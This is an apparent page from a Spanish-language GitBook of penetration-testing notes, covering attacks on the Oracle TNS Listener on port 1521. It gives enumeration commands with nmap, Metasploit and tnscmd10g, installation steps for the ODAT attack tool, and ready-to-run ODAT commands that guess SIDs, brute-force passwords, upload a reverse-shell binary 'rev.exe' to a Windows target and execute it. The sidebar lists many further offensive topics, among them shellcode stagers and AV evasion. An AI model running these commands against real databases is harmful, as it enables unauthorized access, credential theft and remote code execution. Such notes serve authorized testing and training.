CyberSec Notes
  • Bienvenida
    • CyberSec Notes
  • Network Services
    • Port 21 - FTP
    • Port 22 - SSH
    • Port 23 - Telnet
    • Port 25 - SMTP
    • Port 53 - DNS
      • Deploy DNS Server with BIND
    • Port 80/443 - HTTP/HTTPS
      • Wordpress
      • CMS Made Simple (CMSMS)
    • Port 88 - Kerberos
    • Port 386, 636, 3268, 3269 - LDAP
    • Port 445 - SMB
    • Port 1521,1522-1529 - Oracle TNS Listener
    • Port 3128 - Squid
    • Port 5985, 5986 - WinRM
  • Command && Control
    • Sliver C2 [in progress]
  • Ataques en Entornos Windows
    • MalDev
      • AV Evasion
        • Function call obfuscation
      • Code Samples
        • Shellcode Execution C#
        • Shellcode Execution C++
        • Stager HTTP C#
        • Stager HTTP C++
        • Process Inyection C++
        • Process Inyection C#
        • XOR Encrypt C++
    • Directorio Activo
      • Spriying
      • Autenticacion Net-NTLMv2 y tipos de hashes
        • Pass the Hash
        • SMB Relay
      • Autenticación Kerberos
        • Extensiones del protocolo Kerberos (SPNs & PACs)
        • AS_REP Roasting
        • Kerberoasting
        • Silver Ticket Attack
        • Golden Ticket Attack
      • DCSync
      • Mimikatz
      • BloodHound
      • Privilege Escalation
        • PS Credentials in XML format
      • Utils
    • Amsi Bypass
    • Buffer Overflow
      • Stack Based 32 bits [in progress]
        • Windows SLMail 5.5
  • Ataques en Entornos Linux
    • Privilege escalation [in progress]
    • MalDev
      • Simple Reverse Shell
    • Buffer Over Flow
      • Stack Based 32 bits
        • Linux, Vulnerable functions in C programs
    • Persistencia
  • General
    • Host Discovery
    • Reverse Shells Cheet Sheet
    • Pivoting
      • Chisel
      • Port Forwarding
      • Nmap con pivoting
    • Google Dorks [in progress]
    • Denial of Service (DoS)
      • Low and Slow
    • Docker
  • Pentesting Web
    • XML External Entity Injection(XXE)
      • Portswigger Lab #1: Retrieve Files
      • Portswigger Lab #2: Perform SSRF
      • Portswigger Lab #6: Blind XXE to retrieve data via error messages
    • Open Redirect
    • LFI
      • Log Poisoning (Apache, SSH y SMPT)
  • Wireless Pentesting
    • Pre Connection Attacks
      • WEP
      • WPA/WPA2
    • Post Connection Attacks
      • ARP Spoof
    • Fake AP for Captive Portal
Powered by GitBook
On this page
  • Enumeration
  • Basic
  • ODAT
  • Instalation
  • Usage examples
  1. Network Services

Port 1521,1522-1529 - Oracle TNS Listener

PreviousPort 445 - SMBNextPort 3128 - Squid

Last updated 1 year ago

Enumeration

Basic

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>

ODAT

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

Usage examples of ODAT:

  • You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database

  • You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA

  • You have a Oracle account and you want to execute system commands (e.g. reverse shell) in order to move forward on the operating system hosting the database

Tested on Oracle Database 10g, 11g, 12c, 18c and 19c.

Instalation

git clone https://github.com/quentinhardy/odat.git

cd odat/
git submodule init
git submodule update

  • Get instant client basic, sdk (devel) and sqlplus from the Oracle web site:

    • X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html

    • X86: http://www.oracle.com/technetwork/topics/linuxsoft-082809.html

sudo apt-get install libaio1 python3-dev alien python3-pip
pip3 install cx_Oracle

mv /home/kali/downloads/*.rm .
sudo alien --to-deb *.rpm
dpgk -i *

Add to .zshrc

export ORACLE_HOME=/usr/lib/oracle/19.3/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Usage examples

# SID Enumeration
python3 odat.py sidguesser -s <IP-ADDRESS>

# User/Pass bruteforce
python3 odat.py passwordguesser -s <IP> -d <SID>
python3 odat.py passwordguesser -s <IP> --accounts-file <wordlist> -d <SID>

# Get remote/put files
python3 odat.py utlfile --getFile 'C:/Windows/System32/drivers/etc' hosts hosts  -s <IP> -d <SID> -U <username > -P <password> [--sysdba]

python3 odat.py utlfile --putFile 'C:/Windows/System32' rev.exe rev.exe -s <IP> -d <SID> -U <username> -P <password> [--sysdba]

# Execute remote file
python3 odat.py externaltable --exec 'C:/Windows/System32' rev.exe
LogoGitHub - quentinhardy/odat: ODAT: Oracle Database Attacking ToolGitHub